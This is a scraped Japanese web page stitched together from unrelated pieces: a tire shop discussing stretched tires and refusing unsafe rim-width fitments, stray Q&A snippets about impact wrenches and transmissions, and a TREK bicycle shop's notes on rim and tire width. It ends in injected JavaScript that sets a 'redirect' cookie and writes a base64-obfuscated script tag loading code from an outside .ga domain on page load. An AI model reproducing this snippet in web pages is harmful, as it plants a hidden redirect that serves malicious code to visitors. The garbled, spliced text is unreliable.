https://www.youtube.com/watch?v=LADnwQ3g9KY, 「引っ張りタイヤ」というのは、タイヤの幅に対して組み付けスホイールの幅が広い状態です。, 昨日作業を頼まれたのが、「215/35R19サイズのタイヤをに9J幅のホイールに組んで欲しい」という内容。, これ、前にもお見せした画像ですけど、タイヤのサイドウォールがホイールのリムを乗り越えそう。, 適正リム幅以外でお受けできる範疇については、お電話などでお問い合わせいただければ相談させていただきます。, 何度も言いますが、当店では安全性を担保できない組み合わせはお断りさせていただきますのでなにとぞよろしくお願いいたします。, エアの入りにくい引っ張りにちょいと細工をして無理矢理ビードを上げてますが、こういう方法は「絶対に!」やってはいけません。, 事故が起こっていないから大丈夫なのではなく、たまたま事故が起こっていないだけですよ!. まだ発売されていないのに、こんな質問してすみませんが、少しでも情報... インパクトレンチの使い方について教えてもらいたいのですが、車のナットを取る場合はレンチで少し緩めてから使った方がいいのか、それとも直でインパクトレンチを使ってた方がいいのかどちらなのでしょうか?, MT車で5速と6速の設定があるモデルで、5速MTから6速MTに載せ替えた場合、構造変更は必要でしょうか?.

倍率は適当な数字なのですが、極端に狭いタイヤ幅・適正なタイヤ幅・極端に広いタイヤ幅としています。 TREK専門店 らしく TREK に絞って話します。, ナローリム と ワイドリム に合わせたタイヤの幅があって然るべきと思いませんか? 偏平率が下がっているのでハンドリングにはあまり影響ない、とか適用リム幅に収まっているから問題ない、とかいろいろ考えられるので… 今日はGarmin話から離れまして、当店のスタッフ田子や須賀が得意そうな話をしましょう!, 表題にもありますが、リム幅とタイヤ幅の関係についてです。 *|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('